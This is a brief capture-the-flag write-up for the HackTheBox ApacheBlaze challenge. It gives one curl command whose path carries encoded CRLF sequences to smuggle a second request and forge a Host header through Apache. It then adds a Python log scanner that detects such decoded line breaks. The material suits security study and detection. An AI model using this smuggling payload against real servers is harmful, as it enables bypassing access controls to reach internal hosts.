HackTheBox ApacheBlaze Challenge
https://app.hackthebox.com/challenges/546
Description
Step into the ApacheBlaze universe, a world of arcade clicky games. Rumor has it that by playing certain games, you have the chance to win a grand prize. However, before you can dive into the fun, you’ll need to crack a puzzle.
Exploitation
curl -X GET "http://94.237.52.43:32237/api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20/SMUGGLED"
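What the percent-encoded path in the request above decodes to, written as an access-log check (an added example, not part of the original write-up). The function names, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)"')

def inspect_target(target):
    """Decode a raw request target and report any CR/LF-delimited content
    hidden in it. Returns None when the target contains no CR or LF."""
    decoded = unquote(target)
    if "\r" not in decoded and "\n" not in decoded:
        return None
    # Everything after the first line break is what a downstream parser would
    # read as header lines or a further request if the decoded path were
    # written into a forwarded request.
    first, *rest = re.split(r"\r\n|\r|\n", decoded)
    injected = [ln for ln in rest if ln]
    return {
        "path": first,
        "injected_lines": injected,
        "injected_hosts": [ln.split(":", 1)[1].strip()
                           for ln in injected if ln.lower().startswith("host:")],
    }

def scan_log(lines):
    """Return (line_number, finding) for every log entry whose request
    target decodes to something containing a line break."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (finding := inspect_target(m.group("target"))):
            hits.append((n, finding))
    return hits

# Constructed sample log lines (documentation address 192.0.2.10); the second
# carries the same encoded path as the curl request above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /api/games/click_topia HTTP/1.1" 200 120',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1" 200 98',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /assets/logo%20small.png HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for lineno, finding in scan_log(SAMPLE_LOG):
        print(lineno, finding)
```

An encoded space alone (third sample line) is not flagged; only targets that decode to a CR or LF are reported, along with any Host value they carry.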
Summary
ApacheBlaze: identify the broken request handling, prove control, and use it to recover the flag.